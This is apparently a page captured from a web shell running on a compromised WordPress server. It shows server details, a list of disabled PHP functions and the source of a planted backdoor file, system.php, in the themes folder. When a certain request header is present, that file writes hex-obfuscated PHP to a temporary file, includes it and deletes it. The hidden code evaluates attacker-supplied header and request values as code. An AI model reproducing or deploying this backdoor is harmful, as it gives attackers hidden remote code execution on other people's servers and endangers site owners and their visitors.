HEX
Server: Microsoft-IIS/10.0
System: Windows NT WIN8095 10.0 build 20348 (Windows Server 2016) AMD64
User: kytoffice-001 (0)
PHP: 7.4.30
Disabled: exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source
$ pwd: h:/root/home/kytoffice-001/www/expresstinou/wp-content/themes/
Upload Files
File: h:/root/home/kytoffice-001/www/expresstinou/wp-content/themes/system.php
<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['Feature-Policy'])) {
    $c = "\x3c\x3f\x70\x68\x70\x20@\x65\x76a\x6c\x28$\x5f\x48E\x41\x44E\x52\x53[\x22\x53e\x63\x2dW\x65\x62\x73\x6f\x63\x6b\x65\x74\x2d\x41\x63\x63\x65\x70\x74\x22\x5d\x29\x3b\x40\x65\x76\x61\x6c\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x22\x53\x65\x63\x2d\x57\x65\x62\x73\x6f\x63\x6b\x65\x74\x2d\x41\x63\x63\x65\x70\x74\x22\x5d\x29\x3b";
    $f = '.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}
@ Telegram